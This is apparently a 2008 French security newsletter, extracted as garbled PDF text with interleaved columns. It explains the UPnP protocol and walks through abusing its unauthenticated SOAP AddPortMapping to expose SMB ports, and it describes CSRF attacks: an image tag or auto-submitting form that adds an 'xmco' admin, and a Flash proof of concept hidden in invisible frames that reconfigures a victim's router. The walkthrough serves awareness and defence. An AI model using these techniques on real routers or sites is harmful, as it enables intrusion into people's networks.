Xmco Actusecu 20 Upnp

LACTUSCU 20 XMCO | PARTNERS
UPNP (PLUG N PLAY)

UN PROTOCOLE DANGEREUX ?
SO MM AIR E
H acking U P nP : pr s e nt a t io n d u p ro to c o le e t d e s e s f a ib le s s es
L es at t a qu e s UP nP /CSR F : le v e c te u r d a tta q u e F l a s h. . .
L a conf re nc e SSTIC 08
L act ualit du m ois : l a fai l le S S L , le v ir u s M a c e t l a tta q u e D NS ...
L es logic ie ls du m ois : Flying Bit Password Keeper, Keepass et Axban
Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
LACTU SCU N20
Vo u s t e s c o n c e r n p a r l a s c u r i t i n f o r m a t i q u e d e v o t r e e n t r e p r i s e ?
Xmco Partners est un cabinet de conseil dont le mtier est l'audit en scurit informatique.
Tests d'intrusion
Mise l'preuve de vos rseaux, systmes et applications web par nos experts en intrusion
OWASP, OSSTMM, CCWAPSS
Audit de scurit
Audit technique et organisationnel de la scurit de votre Systme d'Information
Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley
Veille en vulnrabilits
Suivi personnalis des vulnrabilits et correctifs affectant votre Systme d'Information
Rponse intrusion
Dtection et diagnostic d'intrusion, collecte des preuves, tude des logs, autopsie de malware
propos du cabinet Xmco Partners
Fond en 2002 par des experts en scurit, dirig par ses fondateurs, nous n'intervenons que sous forme de projets
forfaitaires avec engagement de rsultats.
Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent nos axes majeurs de dveloppement
pour notre cabinet.
Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de missions daccompagnement de
RSSI, dlaboration de schma directeur ou encore de sminaires de sensibilisation auprs de plusieurs grands
comptes franais.
Pour contacter le cabinet Xmco Partners et dcouvrir nos prestations : http://www.xmcopartners.com/

WWW.XMCOPARTNERS.COM

LEDITO Breaking the wall..?
N U M R O2 0
Aprs avoir assist une firewall si les ports 80, 135, 139 et majorit des informations de valeur
prsentation de Cdric Blancher 445 ne doivent pas tre bloqus ? circulent sur les postes d'utilisateur
(EADS/France/Innovation Works) Sachant que 99% des attaquants nomades rpartis chez des clients,
lors de la SSTIC Rennes, j'ai passeront forcment par ces ports, des prestataires, des htels, des
enfin pu nommer une ide qui me le firewall est-il vraiment utile ? De salles de runion, etc. Certains de
trottait dans la tte : la quelle menace nous protge un ces membres ont mis la philosophie
dprimtrisation. firewall ? J'ai plusieurs fois fait cette en application en positionnant leurs
remarque des entreprises. La flottes de nomades directement sur
Comme l'explique habilement rponse obtenue est bluffante : Internet.
Cdric Blancher, la "Oui, ces ports sont ouverts, mais
dprimtrisation est un concept, le firewall les filtre tout de mme et Et la scurit ? Le concept de
pouss par le Jericho Forum, nous protge un minimum contre dprimtrisation insiste sur le fait
plaidant pour le retrait des firewalls. les attaques, comme le spoofing. qu'il faut dpenser de l'argent pour
Cdric Blancher alerte l'assistance Je vois que le discours de vendeurs protger les vritables donnes de
sur le danger d'une telle vision. de firewall est bien rod... valeur de l'entreprise plutt que de
L'argument employ par le Jericho tenter de protger des lments
Forum a de quoi sduire : puisque Mais va-t-on connecter les peu importants.
les attaques arrivent dsormais par systmes critiques bancaires
email, par les sites web ou au directement sur Internet et partir en Le concept est intressant.
travers des VPNs nomades, quoi vacances ? Non. l'heure des datacenters et du Cloud
bon investir des millions dans des Pour cerner un peu la philosophie C o m p u t i n g , l e s fi r e w a l l s d e
firewalls devenus inutiles ? du Jericho Forum, peut-tre faut-il l'entreprise sont-ils encore garants
Beaucoup d'entreprises se sentent savoir que ses membres sont, entre de la scurit des donnes
draisonnablement protges par autres, Boeing, Air France, vitales ?
leur firewall. C'est un fait. Nous le Symantec, Deloitte...(Airbus n'en
vrifions rgulirement lors de nos fait pas partie). Pour ces Frdric Charpentier
audits de scurit : A quoi sert un entreprises internationales, la Consultant XMCO
Hacking with UPnP......................................4 Rsume de la SSTIC...................................19

Prsentation du protocole et des problmes de scurit Prsentation des confrences
associs
LActualit scurit du mois......................24

Analyse des vulnrabilits dcouvertes le mois dernier
CSRF, Flash et UPnP..................................13
Analyse des attaques CSRF via lutilisation dune Outils Libres................................................39
animation Flash Dcouvrez les outils utiles et pratiques.

LACTU SCU N20
LES DESSOUS DU Hacking with UPnP

UPnP a toujours t un
PROTOCOLE UPNP
protocole mconnu. Cr en
1999, ce dernier a peu peu
t implment sur de nombreux
(PLUGN PLAY)
quipements afin de faciliter
linter-connexion sur un rseau
IP.
Cependant 9 ans aprs, la

plupart des utilisateurs ne
connaissent pas rellement
lutilit de ce dernier ni les
risques et les consquences de
lutilisation de ce protocole
en entreprise comme la
maison.
Cet article tentera de

prsenter comment un pirate
peut exploiter les
fonctionnalits de ce protocole
afin de mener diverses actions
malicieuses...
XMCO | Partners
Le protocole UPnP, mconnu, mais efficace... Les profils dfinis par le forum UPnP
Dfinition
Le forum UPnP [1] est un groupe fond en 1999 par
Le protocole UPnP (Plug and Play) a t cr en 1999. plusieurs entreprises de lindustrie (dont Microsoft). Ce
Le but de ce protocole est de groupe est charg de dfinir des normes pour
permettre aux utilisateurs de permettre aux fabricants dimplmenter correctement le
connecter un quipement (Pare-feux, protocole UPnP au sein de leurs quipements. Plus de
routeurs, imprimantes, priphriques 340 vendeurs provenant de divers horizons
m u l t i m d i a , s a n s - fi l o u a u t r e s (lectronique, informatique, rseau, quipements
quipements lectroniques) sans mobiles) ont rejoint ce forum et participent activement
avoir fait Polytechnique la dfinition de nouvelles spcifications.
Microsoft dfinit le protocole de la sorte The overall

networking experience through automatic discovery and
Le protocole UPnP simplifie
device interoperability. UPnP simplifie donc linterconnexion entre les quipements
linterconnexion (partage, communication) entre les dun rseau local sans ncessiter le
quipements d un rseau local et supprime une tape
qui a nerv plus dun utilisateur: la configuration moindre effort ct utilisateur...
Une fois branch sur un rseau, un priphrique Ce forum aide donc dvelopper ce protocole pour
compatible UPnP communique avec les autres simplifier linterconnexion des quipements au sein de
systmes et change des informations afin de sauto- rseaux personnels, mais galement dentreprise.
configurer. Tout ce processus de configuration est
transparent aux yeux de lutilisateur. Le site Web http://www.UPnP.org/ regroupe ainsi tous
Un quipement peut se connecter sur un rseau, les schmas et templates pour chaque type
obtenir une adresse IP, proposer et dcouvrir dquipement compatible avec ce protocole.
automatiquement les services disponibles sur ce Plusieurs catgories ont t dfinies et permettent de
rseau et tout cela automatiquement le rve? classifier les services offerts par UPnP en fonction du

LACTU SCU N20
type de lquipement : passerelles Internet (Internet Le fonctionnement du protocole UPnP
Gateway Device), Imprimantes (Printer Device & Print Les diffrents types dquipements
Basic Service), scanner, quipement de base (Basic
Device), point daccs (WLAN Access Point Device), Les spcifications UPnP utilisent deux termes diffrents
quipement de scurit (DeviceSecurity), Camra de pour caractriser les quipements compatibles UPnP :
surveillance (Digital Security Camera), etc. -Le Device ou serveur : dsigne un quipement qui
Certains de ces profils deviennent des conteneurs pour peut tre contrl par UPnP. Ce dernier possde donc
dautres. un service en coute et des fichiers de configuration
propres aux fonctionnalits proposes.
Plusieurs catgories ont t dfinies par -Le Control Point ou client : quipement ou logiciel
qui est en mesure de dcouvrir les services proposs
le Forum UPnP et permettent de classifier par les quipements (Devices) dun rseau, de
les services offerts par le protocole UPnP... contrler ces quipements en question et de souscrire
un service dalertes qui prviendront des nouvelles
modifications de configuration dun quipement.
Chacun de ces profils possde des standards (au
format XML) qui doivent tre respects lors de Les protocoles
limplmentation du protocole UPnP sur un quipement
donn. Le principe de fonctionnement du protocole UPnP est
relativement simple. Ce protocole est bas sur des
normes dfinies par lUPnP Forum [1]. Il sappuie sur
les standards Internet connus : IP, TCP/UDP, HTTP,
SOAP (XML). Aucun driver nest ncessaire
limplmentation dun quipement UPnP.
Le protocole IP constitue la base pour les

communications entre les priphriques UPnP. Par-
Template UPnP
dessus ce premier protocole, nous retrouvons deux
types de protocoles:
Chaque produit UPnP doit respecter des
spcifications normalises. Cela nempche pas aux
SSDP (Simple Service Discovery Protocol) : ce
fabricants dajouter une couche supplmentaire pour
protocole repose sur lenvoi de requte HTTP over
des services spcifiques en fonction de leurs besoins
UDP en multicast ou en unicast. Il permet de
(certains routeurs peuvent, par exemple avoir une
dcouvrir les services proposs par les quipements
fonctionnalit dactivation du Wifi via UPnP!!!)
UPnP du rseau.
Dans notre exemple, nous exploiterons les
HTTP/SOAP : ce protocole permet de modifier les
caractristiques des routeurs ADSL. Ces derniers sont
configurations via lenvoi de requtes http POST
regroups selon le profil propre aux passerelles Internet
appeles Internet Gateway Device.
GENA (Generic Event Notification Architecture):
gre les notifications de changement dtat

strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![5]
LACTU SCU N20
Les tapes vers ladresse Multicast 239.255.255.250 sur le port
UDP/1900, cest dire vers tous les quipements.
Voici les diffrentes tapes qui caractrisent une
communication UPnP.
Ladressage
Lorsquun quipement est connect sur un rseau, ce

dernier va automatiquement recevoir une adresse
IP dynamique si un serveur DHCP est prsent. Dans le
cas contraire, lquipement va sattribuer une adresse
IP en dterminant si cette adresse IP est dj utilise.
Cette seconde mthode pourrait presque tre
considre comme un acte de piratage!
La phase de dcouverte
Une fois la connectivit IP tablie, lquipement UPnP

(de type Device/Serveur) doit alors alerter les autres
lments du rseau de ses services. Des requtes
SSDP NOTIFY sont alors mises en Multicast vers le
port UDP/1900 de tous les quipements du rseau
local. Chaque lment UPnP est ainsi en mesure de
savoir quels quipements proposent quels services.
Requte M-SEARCH
Chaque quipement (device) Control Point rpondra

via une requte 200 OK et ladresse (entte
LOCATION) du fichier de configuration XML
Requte NOTIFY consulter.
Chaque requte contient une entte LOCATION qui

indiquera lemplacement du fichier XML contenant le
catalogue des services proposs.
De leur ct, les quipements client (ou Control Point)

peuvent galement rechercher les quipements
(devices) UPnP prsents sur le rseau en envoyant,
intervalles rguliers, une requte SSDP M-SEARCH
Rponse dune requte M-SEARCH
Description :
Que ce soit au travers dune requte NOTIFY ou en

rponse une requte M-SEARCH, lquipement
renvoie toujours ladresse de son fichier de
configuration XML indispensable pour le
contrler.
Ce fichier contient une description de lquipement

(nom, numro de srie, adresse du fabricant)
comme le montre la capture suivante.

LACTU SCU N20
Fichier de configuration UPnP dune imprimante Eventing :
Le fichier contient la liste de tous les services quil La dernire tape permet de faire la notification
propose par lintermdiaire de balises service. dvmenents. Cette partie du protocole UPnP est la
moins connue, mme si elle permet dalerter les
quipements du rseau appels Subscribers lorsquun
changement de configuration survient. Ces alertes sont
formates au format GENA. [http://en.wikipedia.org/
wiki/GENA]
Par exemple, ds quun routeur va tre reconfigur, un

Liste des services proposs par lquipement UPnP message va tre envoy aux quipements qui se seront
pralablement inscrits ce service pour leur signaler le
changement effectu.
Cas concrt
Nombreux logiciels utiliss du quotidien utilisent sans

mme que vous le sachiez le protocole UPnP afin
douvrir automatiquement (et discrtement) certains
ports sur votre routeur ADSL.
MSN est lexemple le plus connu. Lutilisation des
services voix et tlphonie ncessite louverture et le
mapping des ports sur le routeur ou le pare-feu. Chose
que MSN sait faire tout seul avec UPnP.
Dautres logiciels comme les clients BitTorrent

Transmission sur Mac OS X ou uTorrent possdent
m m e u n e c a s e c o c h e r a fi n d e n a t t e r
Le contrle : automatiquement les ports dun routeur ADSL.
La dernire tape du protocole va consister lire ce

fichier XML et dy identifier les services disponibles,
les paramtres que lquipement UPnP accepte et
lURL (ControlUrl) laquelle envoyer les futures
commandes.
Muni de toutes ces informations, le client va pouvoir

forger et envoyer une requte SOAP correctement
formate contenant laction quil dsire faire raliser au
device UPnP.

LACTU SCU N20
Les logiciels Peer-to-Peer ou encore certaines consoles Hacking UPnP
de jeux utilisent galement ce procd Les limites du protocole
Ct serveur, de nombreux quipements rseau
implmentent par dfaut UPnP : imprimantes, pare- Aprs cette introduction, ce protocole apparat
feux, serveurs bitTorrent, camras de surveillance, extrmement utile pour les non-informaticiens qui ne
serveurs multimdia (pour identifier les fichiers veulent pas saventurer dans la configuration manuelle
multimdia disponibles sur un rseau). dun quipement. UPnP apporte donc une simplification
notable de linformatique dun point de vue utilisateur,
ce stade, vous avez peut-tre dj sursaut mais quel prix?
Windows peut galement implmenter un client UPnP
en ajoutant cette spcificit dans Ajouter un Quen est-il de la scurit?
composant de Windows, puis Services de mise en
Les auteurs du protocole UPnP ont conu

rseau comme le montre la capture suivante :
un protocole, certes pratique, mais

totalement non scuris
Une question vient tout de suite lesprit : pourquoi
aucune notion de scurit na t aborde dans la
prsentation du fonctionnement dUPnP?? Et bien la
rponse est simple, parce quil ny a pas de scurit
au sein de ce protocoletonnant non?
En effet, comment un quipement peut-il tre

reconfigur distance sans le moindre mot de passe
saisi par lutilisateur?
La rponse est simpleen utilisant un protocole
nimplmentant aucune authentification
Ds lors, le systme Windows peut dcouvrir
automatiquement les priphriques UPnP et alerte Les auteurs de UPnP ont conu un protocole, certes
lutilisateur par une pop-up ds quun tel quipement pratique, mais totalement non scuris. Une lecture des
est dcouvert sur le rseau. Ce dernier est alors ajout spcifications et quelques tests manuels permettent en
dans favoris rseau. quelques minutes de reconfigurer nimporte quel
quipement UPnP laide de simples requtes
SSDP et HTTPah
Prsence dune imprimante UPnP sur le rseau local
Un nouveau service apparat alors dans la liste des

services de WIndows.
Service SSDP de Windows

LACTU SCU N20
Les risques et les consquences
Tous les quipements implmentant UPnP

peuvent donc tre facilement contrls via de
simples requtes HTTP/SOAP. Si certains
quipements proposent de nombreux services,
dautres limitent considrablement le champ
daction du pirate.
Le risque majeur concerne les particuliers. En

effet, la majorit des routeurs ADSL du march
activent ce protocole par dfaut. Un utilisateur
lambda est donc expos une attaque UPnP via
la simple visite dune page web (ce que nous
voquerons dans larticle suivant). Un routeur
personnel peut donc tre reconfigur afin
dexposer les machines internes depuis
lextrieur (NAT de port).
De nombreuses fonctionnalits sont La preuve par lexemple : natter un port via UPnP
offertes par les routeurs UPnP mais ces
Essayons prsent de dmontrer comment un pirate
dernires divergent en fonction des peut utiliser ce protocole partir dun rseau local.
fabricants
Pour notre exemple, nous utiliserons un routeur ADSL
Lexemple le plus frappant serait de natter deux ports du march. Notre premier souhait tait dtablir un
externes vers les ports 139 et 445 dune machine comparatif entre les principaux acteurs du march.
interne afin daccder aux dossiers partags par la Cependant, tous les routeurs ADSL ont t tests et
victime. savrent intrinsquement vulnrables.
Cependant, la plupart de ces derniers offrent peu de
Par ailleurs, dautres fonctionnalits sont offertes par services accessibles via ce protocole ce qui limite la
les routeurs, mais divergent en fonction des vendeurs. surface dattaque. Pourtant, tous implmentent une
On peut entre autres citer les fonctionnalits suivantes : mme fonction phare : le Nat de port
activation de linterface dadministration sur Internet Pour notre exemple, nous tenterons donc de natter un
changement du serveur DNS pour mener des port sur un routeur personnel ce qui parle le plus pour
attaques de Pharming les informaticiens. Cette technique dattaque pourrait
modification des identifiants dadministration exactement tre reproduite sur un autre quipement et
changement des paramtres PPP avoir dautres consquences.
activation et modification de la configuration WIFI
etc.
La recherche dinformations
Autre exemple intressant, la possibilit de crer un
rseau de proxy. En effet, en mappant un port externe
Comme nous lavons expliqu dans notre premire
dune victime vers un autre port externe dune autre
partie, la premire tape consiste rcuprer
machine sur Internet, un pirate peut se crer un
ladresse pointant vers les fichiers de configuration
rseau rout qui lui permettra de camoufler son
XML de notre quipement. Plusieurs mthodes peuvent
adresse IP source lorsque ce dernier souhaite attaquer
tre utilises:
un serveur sur Internet. Bien entendu, ce problme

cration et envoi dun paquet SSDP M-
dimplmentation est rsolu sur les derniers
SEARCH
firmwares des routeurs Internet, mais pas sur tous

coute dune requte NOTIFY envoye par le
routeur
De plus, le pirate doit pouvoir cibler son attaque, c'est-
Nous avons choisi dutiliser deux outils, lun nomm
-dire faire pointer le dernier nud de son rseau vers
UPnPScan et un plugin NMAP permettant de crer ce
le site quil doit attaquer. Le changement de cible de
paquet SSDP, de tlcharger puis de parser le fichier
lattaque ncessite donc de pirater nouveau sa
de configuration afin de renvoyer quelques informations
dernire victime comme le montre le schma suivant.
que nous utiliserons pour mener bien notre attaque.

LACTU SCU N20
Dans un premier temps, nous avons scann Analyse du fichier de configuration
limprimante avec laquelle nous imprimons nos beaux
rapports. La capture suivante montre les rsultats Visualisons avec notre navigateur ce fichier afin
obtenus : marque, modle de limprimante et ladresse dobtenir les caractristiques de lquipement, les
de son fichier de configuration (en rouge). services proposs et les paramtres de notre routeur
ADSL.
Notre routeur propose 3 types de services diffrents.

Chacune des catgories de services proposes
possde son propre fichier de configuration (dfini par
la balise SCPDURL) ainsi quune URL de contrle
(URL o le client va envoyer sa requte dfinie par la
balise controlURL):
1er service: Layer3Forwarding:1
Utilisation dun plugin NMAP
Ritrons la mme opration avec loutil UPnPScan sur

un routeur ADSL sur lequel nous allons nous concentrer
dans la suite de ce paragraphe.
Fichier de configuration Public_UPnP_Layer3F.xml
Ce premier service est donc dfini au sein du fichier

XML Public_UPnP_Layer3F.xml.
Ce dernier propose deux types dactions diffrentes:

S e t D e f a u l t C o n n e c t i o n S e r v i c e ,
GetDefaultConnectionService qui ne servent rien pour
notre attaque.
Utilisation de loutil UPnPScan 2me service: WANCommonInterfaceConfig:1
Mmes rsultats, nous obtenons galement

ladresse du fichier de configuration, savoir:
http://192.168.1.1:8000/Public_UPnP_gatedesc.xml
Fichier de configuration Public_UPnP_WAND.xml
L e fi c h i e r P u b l i c _ U P n P _ WA N D . x m l p r o p o s e
galement diverses actions qui permettent un client
dobtenir des informations sur le statut de la ligne ADSL
(Dbit, informations diverses sur la ligne ADSL)
3 me service: WANIPConnection:1
Fichier de configuration Public_UPnP_WANIPConn.xml

LACTU SCU N20
En tudiant de prs ce dernier, plusieurs balises tudi. Il reste seulement utiliser les bonnes balises
Action retiennent notre attention dont notamment (SOAP-ENV:ENVELOPE) afin de crer une enveloppe
AddPortMappingBingo! SOAP correcte.
Entte de la requte envoye au routeur
Actions disponibles Paramtre de la requte POST (sans retour la ligne lors de

lenvoi)
Aprs cette premire phase, nous avons alors toutes
les clefs en main : le fichier de configuration contenant Lenvoi manuel peut bien entendu tre automatis
le nom de laction et des paramtres ncessaires pour avec un script comme le montre la capture suivante :
natter les ports et ladresse vers laquelle envoyer la
requte
Lenvoi dune requte malicieuse
Passons arbitrairement prsent la phase principale

de notre attaque : lenvoi de la commande qui va
modifier arbitrairement la configuration de notre
routeur.
Cette phase repose uniquement sur lenvoi dune
requte SOAP, cest dire dune requte HTTP POST
possdant en paramtre un fichier XML.
En lisant les spcifications UPnP, le pirate va pouvoir
apprendre le format spcifique de cette requte
savoir :
Entte :

le verbe POST suivi de lURL vers laquelle
envoyer la requte

le champs Host constitu de ladresse IP et du Automatisation de lattaque
service UPnP

le paramtre SOAPACTION qui va prciser Le serveur rpond alors par un 200 OK si la requte est
quelle action raliser sur lquipement cibl accepte.

le champs Content-Type qui spficit lutilisation
du format XML Le pirate a donc russi natter un port externe vers une
adresse IP interne. Dans notre cas, le pirate peut
Paramtre de la requte POST : ensuite accder depuis Internet au partage de
fichier de sa victime(nat des ports 139 et 445).
Les paramtres envoys dans le corps de la requte
ont t identifis au sein du fichier XML que nous avons

LACTU SCU N20
Ct rseau local personnel, ce protocole simplifie la
vie, mais doit tre galement dsactiv, car les
internautes sont malheureusement beaucoup plus
vulnrables comme nous le montrerons dans larticle
suivant.
Conclusion
UPnP est donc un protocole dangereux. Labsence de

mcanisme dauthentification donne aux pirates des
possibilits tendues qui dpendent notamment des
implmentations propres chaque fabricant.
Les routeurs ADSL sont au centre du problme, car la

fonction de port mapping est indispensable pour les
applications daujourdhuidautant plus que la plupart
des internautes utilisent encore des navigateurs
vulnrables aux attaques CSRF comme nous le
prsentons dans le prochain article.
Automatisation de lattaque Webographie
[1] Forum UPnP :

Les consquences http://www.UPnP.org/
Certains chercheront peut-tre le rel intrt de pirater
[2] Blog de GNUCITIZEN
le routeur de son rseau local (et par consquent son
http://www.gnucitizen.org/blog/hacking-with-UPnP-
propre routeur). Mais quen serait-il si on pouvait
universal-plug-and-play/
reconfigurer le routeur de nimporte qui depuis
http://www.gnucitizen.org/blog/flash-UPnP-attack-faq/
Internet et daccder aux partages de ce dernier ??
http://www.gnucitizen.org/blog/UPnP-the-saga-
Rponse dans larticle suivant
continues/
http://www.gnucitizen.org/blog/hacking-the-interwebs/
De mme, quen est-il des utilisateurs qui laissent les
accs Wifi ouverts de leur routeur ? Par exemple, un
pirate pourrait modifier ladresse IP du serveur DNS afin
de raliser des attaques de Pharming
De plus, que pourrait-il se passer si des virus utilisaient
galement UPnP?
En ce qui concerne les entreprises, il est certain quil va

tre difficile de reconfigurer un Checkpoint ou un Pix via
UPnP!! En revanche, un petit scan UDP sur le port
1900 de votre rseau peut savrer riche
denseignements WWW.XMCOPARTNERS.COM
Vous nimaginez pas le nombre dquipements

implmentant UPnP que nous avons rencontrs au
cours de nos audits.
Les solutions
En entreprise, il est certain que le protocole UPnP a

vraiment peu dintrt. La rgle de base est donc de
vrifier que chaque nouvel quipement connect sur un
rseau nactive pas par dfaut ce protocole et donc de
le dsactiver chaque fois que cest possible (par
exemple les imprimantes).

LACTU SCU N20
Les attaques CSRF et UPnP
Les attaques CSRF sont

incontestablement un des nouveaux
vecteurs dattaque web.
CSRF, FLASH ET... UPNP Diffrentes mthodes sont

utilises par les pirates afin
denvoyer linsu de la victime
des requtes HTTP.
Nous dfinirons nouveau ce type

dattaque (voir ActuScu fvrier
2007) en nous concentrant
cette fois-ci, sur les animations
Flash, redoutables armes et
particulirement efficaces dans
lexploitation des faiblesses du
protocole UPnP...
XMCO | Partners
.
Les attaques CSRF Les balises HTML pour les requte GET
Les attaques de Cross Site Request Forgeries Lattaque la plus frquente consiste placer une
(CSRF), sont des attaques lances partir de pages requte GET malicieuse dans lattribut src dune balise
web. HTML. Plusieurs balises HTML telles que <img>
Peu mdiatises, ces attaques peuvent avoir des effets <script> <iframe> peuvent tre utilises pour effectuer
dvastateurs. ce type dattaque.

En effet, la visualisation dune page Web malicieuse
peut forcer le navigateur dun utilisateur authentifi sur
une application Web, effectuer des actions son insu.
Celles-ci utilisent ses droits (cookies) et permettent
notamment de modifier la configuration de son routeur
ADSL, denvoyer des emails, dajouter des utilisateurs
sur une application
Peu mdiatises, les attaques CSRF peuvent

avoir des effets dvastateurs ... Ainsi, le navigateur tente de rcuprer limage en
effectuant une requte vers la cible spcifie. Jusquici
Plusieurs mthodes dattaque ont vu peu peu le jour, rien de malicieux (requte GET classique).
mais les dveloppeurs des navigateurs internet ont Cependant, en plaant une cible telle que :
progressivement restreint les possibilits des
attaquants, en plaant des limitations au fil des
versions.

Un article ddi aux attaques CSRF a dailleurs t
crit dans lActu-Secu n11 [2]
Le navigateur envoie une requte HTTP sur le site
www.site-vulnerable.com,demandant dajouter un

LACTU SCU N20
administrateur ayant pour login xmco et pour mot de Utilisation de code JavaScript pour les requtes
passe xmco. Et cela, automatiquement, sans que le GET et POST
visiteur de la page malicieuse ne sen rende compte.
Les balises HTML permettent uniquement lenvoi de
requtes GET. Pour envoyer des requtes en POST,
lutilisation dun formulaire coupl un code javascript
est ncessaire.
Le formulaire ci-dessous permet denvoyer

automatiquement les paramtres login=xmco et
pass=xmco en requte POST ladresse http://
www.site-vulnerable.com/ajout-admin.php
En visitant cette page, le navigateur de la victime

excute le code Javascript formevil.submit(); qui a pour
effet de soumettre automatiquement le formulaire afin
denvoyer les donnes.
1 Lutilisateur visite un site malicieux.
2 Le site contient une balise image judicieusement Dautre part, lutilisation de lobjet Javascript
conue. XMLHttpRequest, trs utilis pour les applications
3 Le navigateur de lutilisateur tente de charger Ajax, permet galement denvoyer des requtes GET et
limage en envoyant une requte HTTP. Cette requte POST.
permet dajouter le compte xmco/xmco
4 Le pirate peut se connecter sur le site avec le
compte cr linsu de lutilisateur.
Ces attaques sont videments spcifiques, puisque le

pirate doit connatre auparavant les paramtres
envoyer.
Cependant, les navigateurs protgent les utilisateurs,

en empchant cet objet deffectuer des requtes sur un
autre domaine que celui visit : Cross Domain
Protected . Il est alors impossible pour un attaquant
deffectuer une attaque CSRF si le site nest pas
galement vulnrable une attaque de type XSS (afin
dinclure le code javascript via cette seconde
vulnrabilit).
LACTU SCU N20
Les fonctionnalits externes Les solutions contre ce type dattaque
Certaines fonctionnalits externes sont omniprsentes Afin de se prmunir de ce type dattaque, les
sur les navigateurs internet. En effet, de nombreux applications utilisent principalement un token, chane
utilisateurs installent des logiciels simplmentant alatoire gnre par le serveur, valable pour une seule
directement dans les navigateurs (lecteur flash, lecteur action. Ce token, associ la session de lutilisateur,
vido ). est insr dans chaque formulaire.
Un attaquant ne peut donc plus prvoir les donnes
Cest le cas du Flash Player dit par envoyer puisque le token ne peut pas, priori, tre
Adobe. Une tude rvle que prs de prdit.
99% des utilisateurs possdent le Flash
Player dinstall sur leur machine. Exemple dune requte comportant un token :
w w w. s i t e - v u l n e r a b l e . c o m / a j o u t - a d m i n . p h p ?
Sujet de nombreuses attaques ces derniers temps, ce login=xmco&pass=xmco&token=q7645dfgd78erer
logiciel souffrait dune vulnrabilit permettant
denvoyer des requtes, sur des domaines externes. Si le serveur rceptionne une requte comportant un
Cest dailleurs pour cette raison que nous avons token diffrent de celui gnr, laction ne sera pas
commenc nos recherches dbut avril. excute.
Cependant, cette vulnrabilit, corrige uniquement

dans la dernire version (9.0.124), reste largement
exploitable comme nous vous le montrerons dans la
suite de cet article. En effet, peu de personnes
disposent de la toute dernire version du Flash Player
IE 8 ....
dAdobe. IE 8 et lobjet XDomainRequest
Vous pouvez dailleurs connatre la version de Flash
Player utilise en visitant ladresse suivante : Peu dinformations sont disponibles
http://www.macromedia.com/software/flash/about/ actuellement, mais il semblerait que
Microsoft ait choisi dimplmenter un
nouvel objet au sein de Internet
Explorer 8. Ce dernier nomm
XDomainRequest permettrait deffectuer
des requtes sur un autre que celui
visit....Affaire suivre...
Lien Microsoft :
http://msdn.microsoft.com/en-us/library/
cc288060(VS.85).aspx
Statistiques des plugins utiliss avec Internet Explorer
Dornavant, lorsquune animation Flash envoie des

requtes sur un autre domaine que celui visit, le

lecteur Flash tlcharge le fichier Crossdomain.xml. Ce
dernier contient alors la liste des domaines autoriss
se connecter sur ce dernier.
Cependant, Jeremiah Grossman [2] a men une tude

sur les 500 sites web (ALEXA) les plus visits. Parmi
ces derniers :
45% implmentent dj un fichier crossdomain.xml.

7% implment aucune restriction ce qui signifie que
toutes les animations Flash hberges sur des sites
tiers peuvent envoyer des requtes sur ces derniers.
LACTU SCU N20
Le CSRF combin aux faiblesses du protocole Lattaque
UPnP
Comme nous lavons vu dans larticle prcdent, les
Comme nous lavons vu prcdemment, le protocole possibilits offertes par les quipements UPnP sont
UPnP nutilise aucun moyen dauthentification. nombreuses : activation de la connexion WiFi,
Une attaque CSRF est-elle envisageable dans le cadre modification dentres DNS Cependant, ces
du protocole UPnP? Cest ce que nous allons essayer fonctionnalits ne sont pas toujours implmentes. Ces
de vous prouver... dernires dpendent principalement des choix des
constructeurs.

Prambule Notre attaque se limitera natter les ports 139 et 445
afin daccder distance aux dossiers partags.
Aprs avoir vu les diffrentes possibilits offertes aux
pirates pour mener des attaques CSRF, nous allons Le NAT (Network Address Translation) permet de faire
prsent tenter de mener une attaque CSRF sur un la correspondance entre les adresses internes (dun
routeur ADSL en exploitant les faiblesses du protocole rseau local) et ladresse iP publique.
UPnP. Il faut savoir que le service UPnP est activ par En effectuant cette correspondance, il sera alors
dfaut sur de nombreux routeurs ADSL du march. possible daccder aux dossiers partags dun
ordinateur situ sur un rseau local, en se connectant
Le but de notre attaque consiste reconfigurer le sur ladresse IP publique de la socit ou du particulier.
routeur de notre victime en lincitant simplement Cette fonctionnalit est disponible sur tous les routeurs
visualiser une page web malicieuse. ADSL du march, ce qui permet de gnraliser
lattaque.
Lattaque via une simple balise HTML nest pas
envisageable, pour la simple raison que le protocole Pour les besoins de notre tude, nous allons
UPnP nest pas bas sur le traitement de requte dvelopper une preuve de concept au langage FLEX
HTTP classique. Une requte SOAP est ncessaire la (animation Flash) qui permettra denvoyer une requte
construction de paramtre spcifiques en POST (fichier SOAP sur ladresse IP du routeur.
XML).
Lutilisation de code JavaScript avec lobjet

XMLHttpRequest permet de spcifier les paramtres
envoys, il est alors possible de construire une requte
SOAP. Cependant pour des raisons de scurit les
navigateurs empchent cet objet deffectuer des
requtes sur un autre domaine que celui visit. Il est
alors impossible denvoyer une requte sur une
adresse IP autre que celle du serveur hbergeant la
page contenant le code JavaScript.
Nous nous sommes alors intresss la technologie

Flash, largement rpandue au sein les navigateurs
Internet. En effet, le lecteur flash permet lui aussi de
gnrer des requtes avec des enttes HTTP forges
sans restriction.
1- Lutilisateur visualise un site malicieux
2- Le site Internet distribue une animation flash

effectuant une requte sur le routeur ADSL permettant
le nattage de ports
3- Le pirate peut accder aux fichiers partags de

lutilisateur travers Internet.

LACTU SCU N20
Lattaque CSRF doit tre furtive, c'est--dire que la Cette animation permet denvoyer une requte SOAP
victime ne doit pas sapercevoir quelle a t pige. sur ladresse IP du routeur afin de natter le port 139.
Afin de rendre lattaque transparente aux yeux de notre Voici la requte non encode:
victime, nous allons utiliser des frames. Les frames
permettent dafficher plusieurs pages HTML dans
diffrentes zones.
Notre page web malicieuse comportera donc 3 frames,

dont deux qui ne seront pas visibles (via le paramtre
0%).
Code source de la page HTML malicieuse
La premire et deuxime frame vont chacune charger

une page HTML contenant une animation Flash.
Ces animations vont envoyer une requte SOAP sur Lutilisateur victime, pense visualiser un site
ladresse iP du routeur ADSL afin de natter les ports habituel.
139 et 445. Ladresse IP du routeur principal est 95%
192.168.1.1 . Il est cependant possible, en Flash, de
dterminer ladresse IP exacte du routeur, mais ce nest
pas le but de cet article.
La dernire frame charge la page html http://

www.xmcopartners.com/index.html qui est la page
